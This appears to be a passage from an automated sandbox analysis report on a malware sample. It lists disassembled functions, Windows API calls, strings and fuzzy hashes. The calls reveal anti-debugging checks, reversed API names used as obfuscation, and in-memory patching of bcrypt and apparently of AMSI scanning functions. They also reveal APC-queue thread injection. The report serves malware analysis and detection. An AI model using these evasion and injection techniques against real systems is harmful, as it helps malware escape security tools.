                                                              control_flow_graph 6997 2b85a78-2b85ab9 GetModuleFileNameA RegOpenKeyExA 6998 2b85afb-2b85b3e call 2b858b4 RegQueryValueExA 6997->6998 6999 2b85abb-2b85ad7 RegOpenKeyExA 6997->6999 7004 2b85b40-2b85b5c RegQueryValueExA 6998->7004 7005 2b85b62-2b85b7c RegCloseKey 6998->7005 6999->6998 7000 2b85ad9-2b85af5 RegOpenKeyExA 6999->7000 7000->6998 7003 2b85b84-2b85bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 7000->7003 7006 2b85bbb-2b85bbf 7003->7006 7007 2b85c9e-2b85ca5 7003->7007 7004->7005 7008 2b85b5e 7004->7008 7010 2b85bcb-2b85be1 lstrlenA 7006->7010 7011 2b85bc1-2b85bc5 7006->7011 7008->7005 7012 2b85be4-2b85be7 7010->7012 7011->7007 7011->7010 7013 2b85be9-2b85bf1 7012->7013 7014 2b85bf3-2b85bfb 7012->7014 7013->7014 7015 2b85be3 7013->7015 7014->7007 7016 2b85c01-2b85c06 7014->7016 7015->7012 7017 2b85c08-2b85c2e lstrcpynA LoadLibraryExA 7016->7017 7018 2b85c30-2b85c32 7016->7018 7017->7018 7018->7007 7019 2b85c34-2b85c38 7018->7019 7019->7007 7020 2b85c3a-2b85c6a lstrcpynA LoadLibraryExA 7019->7020 7020->7007 7021 2b85c6c-2b85c9c lstrcpynA LoadLibraryExA 7020->7021 7021->7007
                                                              APIs
                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B80000,02BAD790), ref: 02B85A94
                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AB2
                                                              • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B80000,02BAD790), ref: 02B85AD0
                                                              • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B85AEE
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B85B37
                                                              • RegQueryValueExA.ADVAPI32(?,02B85CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B85B7D,?,80000001), ref: 02B85B55
                                                              • RegCloseKey.ADVAPI32(?,02B85B84,00000000,?,?,00000000,02B85B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B85B77
                                                              • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02B85B94
                                                              • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02B85BA1
                                                              • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02B85BA7
                                                              • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02B85BD2
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C19
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C29
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02B85C51
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02B85C61
                                                              • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02B85C87
                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02B85C97
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                              • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                              • API String ID: 1759228003-2375825460
                                                              • Opcode ID: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
                                                              • Instruction ID: 06649c1b97eb25c812fd971c42be33ce8a154b57e3a7e2509423c210bfd99aae
                                                              • Opcode Fuzzy Hash: c5377b95b68045f544ac043e00e60ce5c447c9c4ad9617e02eee636367ff3a98
                                                              • Instruction Fuzzy Hash: A7517271A5020C7AFB31EAA88C46FEFB7AD9B04744F8101E1A64CE6181DB749A44CF61
                                                              Function 02B987A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 8964 2b987a0-2b987c5 LoadLibraryW 8965 2b9880f-2b98815 8964->8965 8966 2b987c7-2b987df GetProcAddress 8964->8966 8967 2b987e1-2b98800 call 2b97d00 8966->8967 8968 2b98804-2b9880a FreeLibrary 8966->8968 8967->8968 8971 2b98802 8967->8971 8968->8965 8971->8968
                                                              APIs
                                                              • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize,02BE13A4,02B9A77C,UacScan), ref: 02B987B4
                                                              • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02B987CE
                                                              • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02BE13A4,02B9A3C7,ScanString,02BE13A4,02B9A77C,ScanBuffer,02BE13A4,02B9A77C,Initialize), ref: 02B9880A
                                                                • Part of subcall function 02B97D00: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                              • String ID: BCryptVerifySignature$bcrypt
                                                              • API String ID: 1002360270-4067648912
                                                              • Opcode ID: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
                                                              • Instruction ID: 84cd771f6ba0f28fc70c2bcfcc91237e7cb19730c5a9ea82ae58ce33788c9fff
                                                              • Opcode Fuzzy Hash: 0bea23942aea87216841285a5e6e1b1da5fbaf5cdb60f3508c492c187a9c2d49
                                                              • Instruction Fuzzy Hash: F6F04471A91254FEEF10AF6CA845BB6739CD746395F2089B9F10D8B984C7705C50CB60
                                                              Function 02B9EBF0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 28libraryloaderCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 8981 2b9ebf0-2b9ec0a GetModuleHandleW 8982 2b9ec0c-2b9ec1e GetProcAddress 8981->8982 8983 2b9ec36-2b9ec3e 8981->8983 8982->8983 8984 2b9ec20-2b9ec30 CheckRemoteDebuggerPresent 8982->8984 8984->8983 8985 2b9ec32 8984->8985 8985->8983
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(KernelBase), ref: 02B9EC00
                                                              • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02B9EC12
                                                              • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02B9EC29
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                              • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                              • API String ID: 35162468-539270669
                                                              • Opcode ID: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
                                                              • Instruction ID: f8bd5b56870205a95a0b051ac978182eeba31eba343d15831c25445f4e4e8da2
                                                              • Opcode Fuzzy Hash: 416b73574a0ec690f650ed304071fd1df158ae3a425129fab880b352320edf44
                                                              • Instruction Fuzzy Hash: 7AF0A77090828CBBDF25E7A888897DCFBB99B05328F6403E5F464611D1E7754644C651
                                                              Function 02B9DBB0 Relevance: 7.6, APIs: 5, Instructions: 80nativefileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DBEB
                                                              • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02B9DC80), ref: 02B9DC1B
                                                              • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02B9DC30
                                                              • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02B9DC5C
                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02B9DC65
                                                                • Part of subcall function 02B84C0C: SysFreeString.OLEAUT32(02B9E950), ref: 02B84C1A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$String$AllocCloseFreeInformationOpenQueryRead
                                                              • String ID:
                                                              • API String ID: 2659941336-0
                                                              • Opcode ID: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
                                                              • Instruction ID: 05f6ddadbb77b1b73633a9bd3330c3c4505ba153439df8648ee6345c9da9b01f
                                                              • Opcode Fuzzy Hash: edf0f4e4a83c0194943acf65ede55866b49e02e84f9d3953b3aceaba14c0ba42
                                                              • Instruction Fuzzy Hash: 7F21BE71A50309BEEB11EAA4CC46FDEB7BDAB49700F5004A1F704E7181DAB4AA058BA5
                                                              Function 02B9E2F8 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 111networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02B9E436
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CheckConnectionInternet
                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                              • API String ID: 3847983778-3852638603
                                                              • Opcode ID: 44a0201bd25748bd7b18598b3403c7afa5ddb88cc03fb0b882a18caf2c4db813
                                                              • Instruction ID: 0f421fb79fafcce328faf3b59a115f4d0a136c8e67dfcb6ac61224242e3baa54
                                                              • Opcode Fuzzy Hash: 44a0201bd25748bd7b18598b3403c7afa5ddb88cc03fb0b882a18caf2c4db813
                                                              • Instruction Fuzzy Hash: 17411A35A50109AFEF10FBA4C880A9EB3FAEF8D710F2148B6E145A7250DA75ED05CF61
                                                              Function 02B9DACC Relevance: 6.1, APIs: 4, Instructions: 80nativefileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B84ECC: SysAllocStringLen.OLEAUT32(?,?), ref: 02B84EDA
                                                              • RtlDosPa.N(00000000,?,00000000,00000000,00000000,02B9DB9E), ref: 02B9DB0B
                                                              • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02B9DB45
                                                              • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02B9DB72
                                                              • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02B9DB7B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: File$AllocCloseCreateStringWrite
                                                              • String ID:
                                                              • API String ID: 3308905243-0
                                                              • Opcode ID: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
                                                              • Instruction ID: 4c09621d0b36204d73890984c43506b9198a8dba053bfccdbf173aea4a719bf6
                                                              • Opcode Fuzzy Hash: ef6a40ba2f16e473eebded45b009db5efe4eaf50d30564eb835dc0ba84b5220e
                                                              • Instruction Fuzzy Hash: 0721BC71A40209BEEB10EAA4CD46F9EB7BDAB05B04F6144A1B704F71D0D7B46A048AA5
                                                              Function 02B979B2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                              • API String ID: 4072585319-445027087
                                                              • Opcode ID: 8a054b902032bce5ba87b6e0771d76f3d087f6fbeaa38f0b85a4b54910fc7c00
                                                              • Instruction ID: cd600c066876ba4d3fdff552ac61a877e73db1743d8690ce40571bf63fc44d3f
                                                              • Opcode Fuzzy Hash: 8a054b902032bce5ba87b6e0771d76f3d087f6fbeaa38f0b85a4b54910fc7c00
                                                              • Instruction Fuzzy Hash: 79110C75650209BFEF00EFA4DC41E9EB7EDEB49710F5188A1F504D7650DA34AA109B60
                                                              Function 02B979B4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51memorynativeCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02B97A27
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                              • String ID: ntdll$yromeMlautriVetacollAwZ
                                                              • API String ID: 4072585319-445027087
                                                              • Opcode ID: 20c71e1caed18aa40bc0acbdce7ec08c6fc59e4b71ee6c516ab99e6a71435992
                                                              • Instruction ID: 0f9216d57d41e459141a85eaebaf72b1a7d430b722ae6fbbc53371307d265252
                                                              • Opcode Fuzzy Hash: 20c71e1caed18aa40bc0acbdce7ec08c6fc59e4b71ee6c516ab99e6a71435992
                                                              • Instruction Fuzzy Hash: BC111E75650209BFEF00EF94DC41F9EB7EDEB49710F5188A1F504D7650DA34AA10DB60
                                                              Function 02B97D00 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49nativeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B97D74
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2b80000_SEPTobn3BR.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                              • String ID: Ntdll$yromeMlautriVetirW
                                                              • API String ID: 2719805696-3542721025
                                                              • Opcode ID: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
                                                              • Instruction ID: e094ef83edf11302806c6ba056f9d0212032e2f9fe6f7aa7b7911ea9d88f5965
                                                              • Opcode Fuzzy Hash: 19cab1c90364cac34d5bf163d149575017ddad3ddd36c62028e8cb5d04880178
                                                              • Instruction Fuzzy Hash: C50100B5610205BFEF00EFA8D841E9EB7FDEB49710F9184A1F508D7A50DA70AD10DB64
                                                              Function 02B98584 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21nativethreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B98090,?,?,00000000,?,02B97A06,ntdll,00000000,00000000,02B97A4B,?,?,00000000), ref: 02B9805E
                                                                • Part of subcall function 02B98020: GetModuleHandleA.KERNELBASE(?), ref: 02B98072
                                                                • Part of subcall function 02B980C8: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B98150,?,?,00000000,00000000,?,02B98069,00000000,KernelBASE,00000000,00000000,02B98090), ref: 02B98115
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B9811B
                                                                • Part of subcall function 02B980C8: GetProcAddress.KERNEL32(?,?), ref: 02B9812D
                                                              • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02B985B5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1423511882.0000000002B81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B80000, based on PE: true
                                                              • Associated: 00000000.00000002.1423479798.0000000002B80000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BAD000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423629715.0000000002BDE000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002BE1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002C56000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.1423795601.0000000002CD8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
